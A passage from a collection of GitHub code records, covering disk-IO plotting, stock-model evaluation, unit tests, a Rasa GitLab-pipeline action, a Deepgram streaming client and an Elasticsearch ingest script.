10\n for row in data:\n start = row[4]\n size = row[5] / 512\n add_range(hist, step, sectormin, start, size)\n\n m = max(hist)\n\n for x in range(len(hist)):\n if m == hist[x]:\n maxi = x\n # hist[maxi] is the most common bucket. walk toward it from the\n # min and max values looking for the first buckets that have some\n # significant portion of the data\n #\n yzoommin = maxi * step + sectormin\n for x in range(0, maxi):\n if hist[x] > hist[maxi] * .05:\n yzoommin = x * step + sectormin\n break\n\n yzoommax = (maxi + 1) * step + sectormin\n for x in range(len(hist) - 1, maxi, -1):\n if hist[x] > hist[maxi] * .05:\n yzoommax = (x + 1) * step + sectormin\n break\nelse:\n words = options.zoom.split(':')\n yzoommin = max(0, float(words[0]) * 2048)\n if float(words[1]) == 0:\n yzoommax = sectormax\n else:\n yzoommax = min(sectormax, float(words[1]) * 2048)\n\nsizes = 0\nflags = [ x[:,0] for x in runs ]\ntimes = data[:,7]\nxmin = numpy.min(times)\nxmax = numpy.max(times)\n\nif options.rolling_avg == None:\n options.rolling_avg = max(1, int((xmax - xmin) / 25))\nelse:\n options.rolling_avg = max(1, int(options.rolling_avg))\n\nif options.xzoom:\n words = [ float(x) for x in options.xzoom.split(':') ]\n if words[0] != 0:\n xmin = words[0]\n if words[1] != 0:\n xmax = words[1]\n\nsectors = 0\nflags = 0\ncompleted = 0\ntimes = 0\n\nif options.no_io_graph:\n total_graphs = 2\nelse:\n total_graphs = 3\n\nif mencoder_found and options.movie:\n data_movie(runs[0])\n sys.exit(1)\n\nf = figure(figsize=(8,6))\n\nif options.title:\n options.title += \"\\n\\n\"\n\n# Throughput goes at the botoom\na = subplot(total_graphs, 1, total_graphs)\nfor i in range(len(runs)):\n label = getlabel(i)\n plot_throughput(a, None, runs[i], '-', label)\n\n# make sure the final second goes on the x axes\nticks = list(arange(xmin, xmax, xmax/8))\nticks.append(xmax)\nxticks = ticks\na.set_xticks(ticks)\na.set_yticklabels( [ \"%d\" % x for x in ticks ])\nif ticks[-1] < 4:\n xticklabels = [ \"%.1f\" % x for x in ticks ]\nelse:\n xticklabels = [ \"%d\" % x for x in ticks ]\na.set_xticklabels(xticklabels)\n\n# cut down the number of yticks to something more reasonable\nticks = a.get_yticks()\nticks = list(arange(0, ticks[-1] + ticks[-1]/4, ticks[-1]/4))\na.set_yticks(ticks)\n\nif ticks[-1] < 4:\n a.set_yticklabels( [ \"%.1f\" % x for x in ticks ])\nelse:\n a.set_yticklabels( [ \"%d\" % x for x in ticks ])\n\na.set_title('Throughput')\na.set_ylabel('MB/s')\n\n# the bottom graph gets xticks, set it here\na.set_xlabel('Time (seconds)')\nif options.label:\n a.legend(loc=(1.01, 0.5), shadow=True, pad=0.5, numpoints=2,\n handletextsep = 0.005,\n labelsep = 0.01,\n prop=FontProperties(size='x-small') )\n\n# next is the seek count graph\na = subplot(total_graphs, 1, total_graphs - 1)\nfor i in range(len(runs)):\n label = getlabel(i)\n plot_seek_count(a, None, runs[i], '-', label)\n\n# cut down the number of yticks to something more reasonable\nticks = a.get_yticks()\nticks = list(arange(0, ticks[-1] + ticks[-1]/4, ticks[-1]/4))\na.set_yticks(ticks)\na.set_yticklabels( [ str(int(x)) for x in ticks ])\n\nif options.no_io_graph and options.title:\n a.set_title(options.title + 'Seek Count')\nelse:\n a.set_title('Seek Count')\n\na.set_ylabel('Seeks / sec')\nif options.label:\n a.legend(loc=(1.01, 0.5), shadow=True, pad=0.5, numpoints=2,\n handletextsep = 0.005,\n labelsep = 0.01,\n prop=FontProperties(size='x-small') )\n\n# and the optional IO graph\nif not options.no_io_graph:\n a = subplot(total_graphs, 1, total_graphs - 2)\n for i in range(len(runs)):\n label = getlabel(i)\n plot_data(a, 0, runs[i], options.io_graph_dots, label + \" Read\")\n plot_data(a, 1, runs[i], options.io_graph_dots, label + \" Write\")\n\n af = AnnoteFinder(axis=a)\n connect('button_press_event', af)\n a.set_title(options.title + 'Disk IO')\n a.set_ylabel('Disk offset (MB)')\n flag = data[:,0]\n sectors = data[:,4]\n zoom = (sectors > yzoommin) & (sectors < yzoommax)\n zoom = data[zoom]\n sectors = zoom[:,4]\n yzoommin = numpy.min(sectors)\n yzommmax = numpy.max(sectors)\n ticks = list(arange(yzoommin, yzoommax, (yzoommax - yzoommin) / 4))\n ticks.append(yzoommax)\n a.set_yticks(ticks)\n a.set_yticklabels( [ str(int(x/2048)) for x in ticks ] )\n a.legend(loc=(1.01, 0.5), shadow=True, numpoints=1,\n markerscale = 1.1,\n prop=FontProperties(size='x-small') )\n a.set_ylim(yzoommin, yzoommax)\n\n# squeeze the graphs over to the left a bit to make room for the\n# legends\n#\nsubplots_adjust(right = 0.8, hspace=0.3)\n\n# finally, some global bits for each subplot\nfor x in range(1, total_graphs + 1):\n a = subplot(total_graphs, 1, x)\n\n # turn off the xtick labels on the graphs above the bottom\n if not options.interactive and x < total_graphs:\n a.set_xticklabels([])\n elif options.interactive:\n a.set_xticks(xticks)\n a.set_xticklabels(xticklabels)\n\n # create dashed lines for each ytick\n ticks = a.get_yticks()\n ymin, ymax = a.get_ylim()\n for y in ticks[1:]:\n try:\n a.hlines(y, xmin, xmax, linestyle='dashed', alpha=0.5)\n except:\n a.hlines(y, xmin, xmax, alpha=0.5)\n a.set_ylim(ymin, ymax)\n # set the xlimits to something sane\n a.set_xlim(xmin, xmax)\n\nif not options.interactive:\n print(f\"saving graph to %s{options.output}\")\n savefig(options.output, dpi=options.dpi, orientation='landscape')\nshow()\n","repo_name":"kdh0102/aos-project","sub_path":"blktrace/seekwatcher.py","file_name":"seekwatcher.py","file_ext":"py","file_size_in_byte":30971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"44375297104","text":"#Write a Python program to create a FIFO queue.\nimport queue\nq=queue.Queue()\nfor i in range(17, 22):\n q.put(i)\nt=1\nwhile not q.empty():\n print(\"{}-Element out\".format(t))\n print(q.get())\n t=t+1\n\n","repo_name":"gambler2020/Python-projects","sub_path":"w3resource/Data_structures/FIFO.py","file_name":"FIFO.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10360811952","text":"import os\nimport sys\nimport json\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"\"\nfrom evaluate import Evaluate\n\nstart_date = 0\nend_date = 0\nstart_year = 0\nend_year = 0\nnumber_of_data = 0\n\ndef load_csv(num):\n stock_data = pd.DataFrame(pd.read_csv('./StockData/stock'+num+'.csv'))\n print(stock_data['date'])\n print(stock_data['date'][0].split('-',1)[0])\n print(stock_data.iloc[-1]['date'].split('-',1)[0])\n global start_year,end_year,start_date,end_date,number_of_data\n #start_year = stock_data['date'][0].split('-',1)[0]\n #end_year = stock_data.iloc[-1]['date'].split('-',1)[0]\n #start_date = stock_data['date'][0]\n end_date = stock_data.iloc[-1]['date']\n #start\n start_date = end_date.replace(end_date.split('-',1)[0],str(int(end_date.split('-',1)[0]) - 9))\n #print(number_of_data)\nload_csv('0050')\n\n#finput = open(\"ten_year_evaluate.csv\",\"w\")\nfinput = open(\"../public_html/avg_eva.csv\",\"w\")\nfinput.write(\"year\"+\",\")\nfinput.write(\"roi of predict\"+\",\")\nfinput.write(\"roi of ans\"+\",\")\nfinput.write(\"roi of baseline,\")\nfinput.write(\"trend_accurancy_rate_train\"+\",\")\nfinput.write(\"trend_accurancy_rate_val\"+\",\")\nfinput.write(\"trend_accurancy_rate_test\"+\"\\n\")\n\nfile=\"build_config.py\"\nstart = \"'date':\"\nend_symbol = \"'end_date':\"\nfin = open(file)\nfout = open('tmp_config.py',\"w\")\nfor line in fin:\n if start in line:\n line = line.replace(line.split(':',1)[1].split(',',1)[0],\"'\"+start_date+\"'\")\n print(line)\n if end_symbol in line:\n line = line.replace(line.split(':',1)[1].split(',',1)[0],\"'\" + end_date + \"'\")\n print(line)\n fout.write(line)\nfin.close()\nfout.close()\n\nfin = open('tmp_config.py')\nfout = open(file,'w')\nfor line in fin:\n fout.write(line)\nfin.close()\nfout.close()\n\nos.system(\"python3 build_train_data.py\")\n#os.system(\"python3 stockModel.py 0050\")\ntrain = np.zeros(5)\ntest = np.zeros(5)\nval = np.zeros(5)\npredict = np.zeros(5)\nans = np.zeros(5)\nbaseline = np.zeros(5)\nstock_symbol = \"0050\"\nfor i in range(5):\n os.system(\"python3 model_start.py 0050\")\n evaluate = Evaluate(stock_symbol)\n predict[i] = evaluate.roi(\"predict\")\n ans[i] = evaluate.roi(\"ans\")\n baseline[i] = evaluate.roi(\"baseline\")\n train[i] = (evaluate.trend_accurancy_rate(\"train\"))\n test[i] = (evaluate.trend_accurancy_rate(\"test\"))\n val[i] = (evaluate.trend_accurancy_rate(\"val\"))\n#os.system(\"python3 ./Model/transformer.py 0050\")\n'''train /= 5\ntest /= 5\nval /= 5\nbaseline /= 5\npredict /= 5\nans /= 5\n'''\n#stock_symbol = \"0050\"\n'''\nevaluate = Evaluate(stock_symbol)\nfinput.write(start_date+\"~\"+end_date+\",\")\nfinput.write(str(np.mean(predict))+\"%/\"+str(np.std(predict, ddof=1))+\"%,\")\nfinput.write(str(np.mean(ans))+\"%/\"+str(np.std(ans, ddof=1))+\"%,\")\nfinput.write(str(np.mean(baseline))+\"%/\"+str(np.std(baseline, ddof=1))+\"%,\")\nfinput.write(str(np.mean(train))+\"%/\"+str(np.std(train, ddof=1))+\"%,\")\nfinput.write(str(np.mean(val))+\"%/\"+str(np.std(val, ddof=1))+\"%,\")\nfinput.write(str(np.mean(test))+\"%/\"+str(np.std(test, ddof=1))+\"%\\n\")\nfinput.write(\"\\n\")\n\n'''\n\nevaluate = Evaluate(stock_symbol)\nfinput.write(start_date+\"~\"+end_date+\",\")\nfinput.write(str(np.mean(predict))+\"%,\")\nfinput.write(str(np.mean(ans))+\"%,\")\nfinput.write(str(np.mean(baseline))+\"%,\")\nfinput.write(str(np.mean(train))+\"%,\")\nfinput.write(str(np.mean(val))+\"%,\")\nfinput.write(str(np.mean(test))+\"%\\n\")\nfinput.write(\",\")\nfinput.write(str(np.std(predict, ddof=1))+\"%,\")\nfinput.write(str(np.std(ans, ddof=1))+\"%,\")\nfinput.write(str(np.std(baseline, ddof=1))+\"%,\")\nfinput.write(str(np.std(train, ddof=1))+\"%,\")\nfinput.write(str(np.std(val, ddof=1))+\"%,\")\nfinput.write(str(np.std(test, ddof=1))+\"%\\n\")\nfinput.write(\"\\n\")\nevaluate.predictplt()\n\nfinput.close()\n","repo_name":"Zxiro/MBI","sub_path":"Evaluate/avg_evaluate.py","file_name":"avg_evaluate.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3873457313","text":"import json\nimport pandas as pd\nfrom pathlib import Path\nfrom itertools import repeat\nfrom collections import OrderedDict\nimport subprocess\nimport collections\n\n\ndef ensure_dir(dirname):\n dirname = Path(dirname)\n if not dirname.is_dir():\n dirname.mkdir(parents=True, exist_ok=False)\n\n\ndef read_json(fname):\n fname = Path(fname)\n with fname.open('rt') as handle:\n return json.load(handle, object_hook=OrderedDict)\n\n\ndef write_json(content, fname):\n fname = Path(fname)\n with fname.open('wt') as handle:\n json.dump(content, handle, indent=4, sort_keys=False)\n\n\ndef inf_loop(data_loader):\n ''' wrapper function for endless data loader. '''\n for loader in repeat(data_loader):\n yield from loader\n\n\ndef flatten(d, root_key='', sep='_'):\n items = []\n for k, v in d.items():\n new_key = root_key + sep + k if root_key else k\n try:\n items.extend(flatten(v, new_key, sep=sep).items())\n except:\n items.append((new_key, v))\n return dict(items)\n\n\ndef dict_to_str(d, sep='_'):\n return f\"{sep}\".join(\"{!s}={!r}\".format(key, val)\n for key, val in d.items())\n\n\ndef mod_dict(dict_to_modify, params):\n def recurse_dict(d, k, v):\n if (k in d):\n d[k] = v\n return d\n for kk, vv in d.items():\n if (type(vv) == collections.OrderedDict or type(vv) == dict):\n d[kk] = recurse_dict(vv, k, v)\n return d\n for k, v in params.items():\n if k in dict_to_modify:\n dict_to_modify[k] = v\n continue\n for kk, vv in dict_to_modify.items():\n if (type(vv) == collections.OrderedDict or type(vv) == dict):\n dict_to_modify[kk] = recurse_dict(vv, k, v)\n return dict_to_modify\n\n\nclass MetricTracker:\n def __init__(self, *keys, writer=None):\n self.writer = writer\n self._data = pd.DataFrame(index=keys, columns=['total', 'counts', 'average'])\n self.reset()\n\n def reset(self):\n for col in self._data.columns:\n self._data[col].values[:] = 0\n\n def update(self, key, value, n=1):\n if self.writer is not None:\n self.writer.add_scalar(key, value)\n self._data.total[key] += value * n\n self._data.counts[key] += n\n self._data.average[key] = self._data.total[key] / self._data.counts[key]\n\n def avg(self, key):\n return self._data.average[key]\n\n def result(self):\n return dict(self._data.average)\n\ndef get_gpu_memory_map():\n import torch\n \"\"\"Get the current gpu usage.\n Adopted from https://discuss.pytorch.org/t/access-gpu-memory-usage-in-pytorch/3192/4\n Returns\n -------\n usage: dict\n Keys are device ids as integers.\n Values are memory usage as integers in MB.\n \"\"\"\n result = subprocess.check_output(\n [\n 'nvidia-smi', '--query-gpu=memory.used',\n '--format=csv,nounits,noheader'\n ], encoding='utf-8')\n # Convert lines into a dictionary\n gpu_memory = [int(x) for x in result.strip().split('\\n')]\n gpu_memory_map = dict(zip(range(len(gpu_memory)), gpu_memory))\n for idx in range(torch.cuda.device_count()):\n # doesn't distinguish between nvidia-smi idx and torch cuda idxs..\n mem = torch.cuda.get_device_properties(idx).total_memory / 1024.0 ** 2\n gpu_memory_map[idx] /= mem\n return gpu_memory_map\n\ndef import_module(base_name, config_name, config):\n \"\"\"\n dynamic import\n \"\"\"\n return getattr(__import__('{}.{}'.format(base_name, config[config_name]['module_name'])), config[config_name]['type'])\n","repo_name":"sajaddarabi/ContrastiveMixup","sub_path":"utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"95"} +{"seq_id":"7465774775","text":"from exojax.spec.hitrancia import interp_logacia_matrix\nfrom exojax.spec.hitrancia import interp_logacia_vector\nfrom exojax.spec.hitrancia import read_cia\nfrom exojax.test.data import TESTDATA_H2_H2_CIA\nfrom exojax.utils.grids import wavenumber_grid\nimport pkg_resources\nimport numpy as np\nimport pytest\n\ndef test_interp_logacia_matrix():\n nus = 4310.0\n nue = 4390.0\n filename = pkg_resources.resource_filename(\n 'exojax', 'data/testdata/' + TESTDATA_H2_H2_CIA)\n nucia, tcia, ac = read_cia(filename, nus, nue)\n Tarr = np.array([1000.0, 2000.0])\n logac = np.log10(ac)\n nu_grid, wav, r = wavenumber_grid(nus,nue,10000,xsmode=\"premodit\")\n logac_cia = interp_logacia_matrix(Tarr, nu_grid, nucia, tcia, logac)\n assert np.all(np.shape(logac_cia) == (2,10000))\n assert np.sum(logac_cia) == pytest.approx(-891133.44)\n\ndef test_interp_logacia_vector():\n nus = 4310.0\n nue = 4390.0\n filename = pkg_resources.resource_filename(\n 'exojax', 'data/testdata/' + TESTDATA_H2_H2_CIA)\n nucia, tcia, ac = read_cia(filename, nus, nue)\n T=2000.0\n logac = np.log10(ac)\n nu_grid, wav, r = wavenumber_grid(nus,nue,10000,xsmode=\"premodit\")\n logac_cia = interp_logacia_vector(T, nu_grid, nucia, tcia, logac)\n assert np.all(np.shape(logac_cia) == (10000,))\n assert np.sum(logac_cia) == pytest.approx(-445566.72)\n\nif __name__ == \"__main__\":\n test_interp_logacia_matrix()\n test_interp_logacia_vector()","repo_name":"HajimeKawahara/exojax","sub_path":"tests/unittests/spec/cia/hitrancia_test.py","file_name":"hitrancia_test.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"95"} +{"seq_id":"27153537685","text":"import subprocess\nimport multiprocessing\n\ndef scan(i):\n subprocess.call([\"/home/jack/projects/sundar/scan_network.sh\", str(i), str(i)])\n\nif __name__ == \"__main__\":\n for i in range(0, 256):\n p = multiprocessing.Process(target=scan, args=[i,])\n p.start()\n\n\n","repo_name":"jackkolb/sundar","sub_path":"scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"69962620152","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef plot_metrics(metrics, titles, x_labels_list, y_labels_list, ncols=3):\n nrows = int(np.ceil(len(metrics) / ncols))\n fig, axes = plt.subplots(nrows=nrows, ncols=ncols, figsize=(5 * ncols, 5 * nrows))\n\n for idx, (ax, metric, title, x_labels, y_labels) in enumerate(zip(axes.flat, metrics, titles, x_labels_list, y_labels_list)):\n heatmap = ax.imshow(metric, cmap='viridis')\n cbar = fig.colorbar(heatmap, ax=ax)\n\n ax.set_xticks(np.arange(metric.shape[1]))\n ax.set_yticks(np.arange(metric.shape[0]))\n ax.set_xticklabels(x_labels)\n ax.set_yticklabels(y_labels)\n\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n for i in range(metric.shape[0]):\n for j in range(metric.shape[1]):\n ax.text(j, i, metric[i, j], ha=\"center\", va=\"center\", color=\"w\")\n\n ax.set_title(title)\n\n # Remove empty subplots\n for idx in range(len(metrics), nrows * ncols):\n fig.delaxes(axes.flat[idx])\n\n plt.tight_layout()\n plt.show()\n\n# Example usage\nmetric1 = np.array([[1667., 0., 0. , 0. , 0.],\n [ 455., 1670., 0. , 0., 0.],\n [ 417., 412., 1384., 0., 0.],\n [ 324., 310., 339., 1112., 0.],\n [ 187., 169., 199., 160., 526.]])\n\nmetric2 = np.array([[586., 0., 0., 0., 0.],\n [117., 358., 0, 0., 0.],\n [ 88., 71., 388., 0., 0.],\n [160., 122., 105., 692., 0.],\n [145., 118., 123., 153., 540.]])\nmetric3 = np.array([[453. , 0. , 0. , 0.],\n [148., 569., 0., 0.],\n [106., 124., 609., 0.],\n [ 94., 104., 118., 444.]])\n\nx_labels1 = ['Macro', 'Mega', 'Micro', 'Nano', 'No Influencer']\ny_labels1 = ['Macro', 'Mega', 'Micro', 'Nano', 'No Influencer']\n\nx_labels2 =['Gaming', 'Other', 'Price Update', 'Technical Information', 'Trading Matters']\ny_labels2 = ['Gaming', 'Other', 'Price Update', 'Technical Information', 'Trading Matters']\n\nx_labels3 = ['Advertising', 'Announcement', 'Financial Information', 'Subjective Opinion']\ny_labels3 = ['Advertising', 'Announcement', 'Financial Information', 'Subjective Opinion']\n\nplot_metrics([metric1, metric2, metric3], ['Subtask 1', 'Subtask 2', 'Subtask 3'], [x_labels1, x_labels2, x_labels3], [y_labels1, y_labels2, y_labels3])\n","repo_name":"HamedBabaei/author-profiling-pan2023","sub_path":"visualization/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"71488847034","text":"from rasa_core_sdk import Action\nimport requests\nimport os\nfrom urllib3.exceptions import NewConnectionError\nfrom requests.exceptions import HTTPError\nimport telegram\n\nACCESS_TOKEN = os.environ.get(\"ACCESS_TOKEN\", \"\")\nGITLAB_SERVICE_URL = os.getenv(\"GITLAB_SERVICE_URL\", \"\")\nSECS = 10.0\n\n\nclass RerunPipeline(Action):\n def name(self):\n return \"action_rerun_pipeline\"\n\n def run(self, dispatcher, tracker, domain):\n headers = {'Content-Type': 'application/json'}\n tracker_state = tracker.current_state()\n chat_id = tracker_state[\"sender_id\"]\n if self.check_user(chat_id, headers):\n try:\n message = tracker.latest_message.get(\"text\")\n splitted_message = message.split()\n pipeline_id = splitted_message[-1]\n try:\n response = requests.get(GITLAB_SERVICE_URL +\n \"rerun_pipeline/{chat_id}/\"\n \"{pipeline_id}\"\n .format(chat_id=chat_id,\n pipeline_id=pipeline_id),\n timeout=SECS,\n headers=headers)\n except requests.exceptions.Timeout:\n text = \"Desculpa, não consegui fazer o que você\"\\\n \" me pediu! 😕\"\n bot = telegram.Bot(token=ACCESS_TOKEN)\n bot = bot.send_message(chat_id=chat_id, text=text)\n else:\n response.raise_for_status()\n dispatcher.utter_message(\"Tudo certo, reiniciei sua\"\n \" pipeline!\")\n except HTTPError:\n dispatcher.utter_message(\n \"Ai que pena... não consegui reiniciar a pipeline que você\"\n \" me pediu 😔\")\n dispatcher.utter_message(\n \"Tenta clicar novamente ai nesse botão. Se não der certo,\"\n \" sugiro entrar no GitLab e tenta reiniciar você mesmo...\")\n except ValueError:\n dispatcher.utter_message(\n \"Estou com problemas para encontrar seus dados agora,\"\n \" me mande novamente uma mensagem mais tarde.\")\n except NewConnectionError:\n dispatcher.utter_message(\n \"Estou com problemas para me conectar agora, me mande \"\n \"novamente uma mensagem mais tarde.\")\n else:\n dispatcher.utter_message(\"Para rodar novamente um pipeline\"\n \" é necessário que você tenha um \"\n \"repositório do gitlab cadastrado!\")\n dispatcher.utter_message(\"Quando quiser cadastrar é só avisar!\")\n return []\n\n def check_user(self, chat_id, headers):\n url = GITLAB_SERVICE_URL + \"user/infos/{chat_id}\".\\\n format(chat_id=chat_id)\n response = requests.get(url, headers=headers)\n data = response.json()\n if data[\"username\"] and data[\"repository\"]:\n return True\n return False\n","repo_name":"fga-eps-mds/2019.1-ADA","sub_path":"ada/actions/rerun_pipeline.py","file_name":"rerun_pipeline.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"pt","doc_type":"code","stars":11,"dataset":"github-code","pt":"95"} +{"seq_id":"23940830411","text":"from django.urls import reverse\n\nfrom tests import factories as f\n\nfrom taiga.base.utils import json\n\nimport pytest\npytestmark = pytest.mark.django_db\n\n\n@pytest.fixture\ndef user():\n return f.UserFactory.create()\n\n\ndef test_create_feedback(client, user):\n url = reverse(\"feedback-list\")\n\n feedback_data = {\"comment\": \"One feedback comment\"}\n feedback_data = json.dumps(feedback_data)\n\n client.login(user)\n\n response = client.post(url, feedback_data, content_type=\"application/json\")\n assert response.status_code == 200\n\n assert response.data.get(\"id\", None)\n assert response.data.get(\"created_date\", None)\n assert response.data.get(\"full_name\", user.full_name)\n assert response.data.get(\"email\", user.email)\n\n client.logout()\n\n\ndef test_create_feedback_without_comments(client, user):\n url = reverse(\"feedback-list\")\n\n feedback_data = json.dumps({})\n\n client.login(user)\n\n response = client.post(url, feedback_data, content_type=\"application/json\")\n assert response.status_code == 400\n assert response.data.get(\"comment\", None)\n\n client.logout()\n","repo_name":"imfht/djangoapps","sub_path":"taiga-back-master/tests/integration/test_feedback.py","file_name":"test_feedback.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"2798234641","text":"from deepgram import Deepgram\nimport asyncio\nfrom dotenv import dotenv_values\nimport pyaudio\nimport time\nimport json\nimport base64\nimport numpy as np\n\n# Setting up the Deepgram API Key\naccess_code = dotenv_values(\".env\")\nprint(access_code['DEEPGRAM_ACCESS_CODE'])\n\n# Set the audio parameters\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 16000\nCHUNK = 3200\n\ncurrent_timestamp = time.time()\ntarget_timestamp = current_timestamp + 10\ndeepgram = Deepgram(access_code['DEEPGRAM_ACCESS_CODE'])\n\n# Create the PyAudio audio stream\naudio_stream = pyaudio.PyAudio().open(\n format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK\n)\n\n# WebSocket connection function\nasync def connect_and_stream_audio():\n try:\n deepgramLive = await deepgram.transcription.live({'punctuate': True, 'interim_results': False, 'language': 'en-US', 'encoding': 'linear16'})\n except Exception as e:\n print(f'Could not open socket: {e}')\n return\n\n deepgramLive.registerHandler(deepgramLive.event.CLOSE, lambda c: print(f'Connection closed with code {c}.'))\n # Listen for any transcripts received from Deepgram and write them to the console\n deepgramLive.registerHandler(deepgramLive.event.TRANSCRIPT_RECEIVED, print)\n print('WebSocket connection established')\n\n try:\n while True:\n await asyncio.sleep(0.1)\n audio_data = audio_stream.read(CHUNK)\n audio_data_linear16 = (np.frombuffer(audio_data, dtype=np.int16) * 32767).astype(np.int16)\n audio_data_linear16 = base64.b64encode(audio_data_linear16)\n # print(audio_data_linear16)\n deepgramLive.send(audio_data_linear16)\n\n # deepgramLive.send(json.dumps({'type': 'KeepAlive'}))\n\n except KeyboardInterrupt:\n pass\n\n # await deepgramLive.finish()\n audio_stream.stop_stream()\n audio_stream.close()\n print(time.time() - current_timestamp)\n\n# Run the WebSocket connection and audio streaming\nasyncio.run(connect_and_stream_audio())\n","repo_name":"SaarthShah/Deepgram","sub_path":"real_time_transcriber3.py","file_name":"real_time_transcriber3.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72165917114","text":"from enum import Enum\nfrom Utils import muda_base_de_numero\n\nclass TiposEvento(Enum):\n CHEGADA = 0\n SAIDA = 1\n\nclass Escalonador:\n\n eventos = []\n tempoGlobal = 0.0\n\n def __init__(self, geradorDeAleatorios, listaDeFilas):\n self.geradorDeAleatorios = geradorDeAleatorios\n self.__inicializar_eventos_com_primeiras_chegadas(listaDeFilas)\n \n def __inicializar_eventos_com_primeiras_chegadas(self, listaDeFilas):\n for fila in listaDeFilas:\n if fila.chegadaPrimeiro > -1:\n self.__agendar_evento(TiposEvento.CHEGADA, fila.chegadaPrimeiro, fila)\n \n def inicializar_simulacao(self):\n while(self.geradorDeAleatorios.ha_numero_para_gerar()):\n evento = self.__pop_proximo_evento()\n self.tempoGlobal = evento[\"tempo\"]\n\n if evento[\"tipo\"] == TiposEvento.CHEGADA:\n self.__gerencia_chegada(evento)\n else:\n self.__gerencia_saida(evento)\n\n def __agenda_saida(self, fila):\n if fila.tem_espaco():\n fila.adicionar_na_fila(self.tempoGlobal)\n\n # Se tem um servidor livre ja atende a requisicao\n if fila.get_quantidade_na_fila() <= fila.nServidores:\n numeroAleatorio = self.geradorDeAleatorios.gerar_proximo_numero_aleatorio()\n horarioDaSaida = self.__calcular_tempo_proximo_evento(fila.intervalorAtendimento, numeroAleatorio)\n self.__agendar_evento(TiposEvento.SAIDA, horarioDaSaida, fila)\n\n def __gerencia_chegada(self, evento):\n fila = evento[\"fila\"]\n self.__agenda_saida(fila)\n \n # Agenda a proxima chegada, se nao nao faz nada e termina a execucao\n if self.geradorDeAleatorios.ha_numero_para_gerar():\n numeroAleatorio = self.geradorDeAleatorios.gerar_proximo_numero_aleatorio()\n horarioDaChegada = self.__calcular_tempo_proximo_evento(fila.intervaloChegada, numeroAleatorio)\n self.__agendar_evento(TiposEvento.CHEGADA, horarioDaChegada, fila)\n\n def __gerencia_saida(self, evento):\n fila = evento[\"fila\"]\n fila.remover_da_fila(self.tempoGlobal)\n\n # Se tem servidor livre na fila atual, agenda a proxima saida\n if fila.get_quantidade_na_fila() >= fila.nServidores:\n numeroAleatorio = self.geradorDeAleatorios.gerar_proximo_numero_aleatorio()\n horarioDaSaida = self.__calcular_tempo_proximo_evento(fila.intervalorAtendimento, numeroAleatorio)\n self.__agendar_evento(TiposEvento.SAIDA, horarioDaSaida, fila)\n\n # Se existe uma fila em tandem, adiciona na proxima\n if self.geradorDeAleatorios.ha_numero_para_gerar():\n numeroAleatorio = self.geradorDeAleatorios.gerar_proximo_numero_aleatorio()\n filaDeSaida = fila.get_saida_da_fila(numeroAleatorio)\n if filaDeSaida is not None:\n self.__agenda_saida(filaDeSaida)\n \n def __pop_proximo_evento(self):\n indexMaisProximo = 0\n diferencaMaisProximo = self.eventos[indexMaisProximo][\"tempo\"] - self.tempoGlobal\n \n for i in range(1, len(self.eventos)):\n evento = self.eventos[i]\n diferencaEventoI = evento[\"tempo\"] - self.tempoGlobal\n if diferencaEventoI < diferencaMaisProximo:\n indexMaisProximo = i\n diferencaMaisProximo = diferencaEventoI\n \n proximoEvento = self.eventos[indexMaisProximo]\n del self.eventos[indexMaisProximo]\n\n return proximoEvento\n\n def __calcular_tempo_proximo_evento(self, intervalo, numeroRandomico):\n return self.tempoGlobal + muda_base_de_numero(intervalo[0], intervalo[1], numeroRandomico)\n\n\n def __agendar_evento(self, tipoEvento, tempoDoEvento, fila):\n self.eventos.append(\n {\n \"tipo\" : tipoEvento,\n \"tempo\" : tempoDoEvento,\n \"fila\" : fila\n }\n )","repo_name":"brunohlippert/SimuladorDeFilas","sub_path":"Escalonador.py","file_name":"Escalonador.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19258161802","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime\nfrom elasticsearch import Elasticsearch, helpers\n\ncolumns = ['date', 'total_cases', 'new_cases',\n 'total_deaths', 'new_deaths',\n 'new_tests', 'total_tests',\n 'total_vaccinations', 'new_vaccinations',\n 'cardiovasc_death_rate', 'diabetes_prevalence']\n\nesclient = Elasticsearch(['localhost:9200'], timeout=30)\n\ndf = pd.read_csv('data/owid-covid-data.csv')\ndf = df[df['iso_code'] == 'USA']\ndf = df[columns]\ndf.replace(np.nan, 0, inplace=True)\ndf.dropna(inplace=True)\n\nactions = []\nfor idx in df.index:\n d = dict(df.loc[idx])\n d['date'] = datetime.strptime(d['date'], '%Y-%m-%d')\n actions.append({\n \"_op_type\": \"index\",\n \"_index\": \"covid\",\n \"_source\": d\n })\n\nfor ok, response in helpers.streaming_bulk(client=esclient, actions=actions, index='covid',\n max_retries=5, 